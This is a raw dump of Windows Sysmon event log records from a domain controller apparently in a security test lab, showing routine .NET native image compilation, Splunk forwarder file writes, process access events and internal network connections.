AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CXT5AL39J0\System.Speech.ni.dllMD5=707DF04B3DBB37B911D91E9EF789D44E,SHA256=26AB4B98729C63EFAC8E1FA8C2570571F22AF9345E904460823DD709C1127152,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:28.873{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b38-0\System.Speech.dll2021-06-23 21:01:28.873 23542300x800000000000000019077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.685{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF4D608EA9D30DB2ECE1851642FC224,SHA256=A9AD08C4C236BA50A2197F63080C5024E1F189007E02851B3B302C940591B330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.263{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911CA334AB6F5E15B416C70A7730FFA7,SHA256=BA69D8590E95DAB595B628CBAD78287955418C0C6F267E9AA180403D8E9FD341,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.263{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF3F49A06D35FCD71E78E416BC477C4,SHA256=2CB8B90B1B5661100C32CA9C307BCD6474B377315260F836F2C944B585454AAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.015{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.015{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.113{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61371-false10.0.1.12-8000- 23542300x800000000000000019089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:30.290{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA90B499592C15B48454FC861053F1B0,SHA256=AD3FFF68BC8F2712F22B9F2450DB98C151F684E012FCC203A79C9654E8E87B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:30.040{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F4A3344DE59AFACEBDF71CA840DAC95,SHA256=6B05E2AC8457147E4733F2BE8B2A829791A6E1A92B2619F5335E35A5E81A3EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:31.322{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=160F70019BF6FA8B91C853FA93D150F4,SHA256=FE6EDCA3121178B99DCB882E0288A9896B0F758873AD494F8BE40B26DB7C12A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:32.337{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BEA06C12F0AFC43A600F8C3114D6EFE,SHA256=D1ACBA40FE92C5B770B2FBC44E7DCF51EDCC86DBCF5962303F1CE922169FAC3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:33.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D352DCAF9FB89DBDE2B42445509BBB2F,SHA256=6B33A0F158DA500CC523DB215626ED300DE4D7CD374900FC98F24E08B494BDD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:34.369{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CF86F6C2CF209FAA2DA029C7B71C6A,SHA256=790D3FBB36A747897F2FB18ABE4A125EFA1C38930226111BD68103E5921C1E67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:35.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8058AFA6B19836C24F59F5D624DBFC40,SHA256=5211539FF81EF24C39ADD4F35434321C4511E9295084A093B42736BE456C046E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:36.853{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e4-0\System.Web.dll2021-06-23 21:01:36.853 354300x800000000000000019097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:35.125{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61372-false10.0.1.12-8000- 23542300x800000000000000019096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:36.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB5BFBC2E4A7A79813EC1BAA1B5B110A,SHA256=8E94EAD2B15EDFB9E34CDB0841BBAF605042A4F7169A4CD1E5A6EE4484B70545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.962{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.947{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.947{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.915{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.900{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.900{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.853{4DB9351A-A131-60D3-A302-00000000CF01}5804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMT7Y5YGDN\System.Web.Abstractions.ni.dll.auxMD5=AA12FB15CD84FE22BF84E10CE38D7B76,SHA256=A4703406C4CAC95E82DE00395AC1A5319B8FCEED28FE01A44E3D0B2270DDA9A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.853{4DB9351A-A131-60D3-A302-00000000CF01}5804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMT7Y5YGDN\System.Web.Abstractions.ni.dllMD5=548842E659EBDC1404A4C1C8EBE6E83C,SHA256=870B6C8418F6F920A88A86D2582C7D1B06113086F6E5EC91DFB5108977C2E7BF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:37.837{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16ac-0\System.Web.Abstractions.dll2021-06-23 21:01:37.837 10341000x800000000000000019107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.822{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.806{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.806{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.681{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.665{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 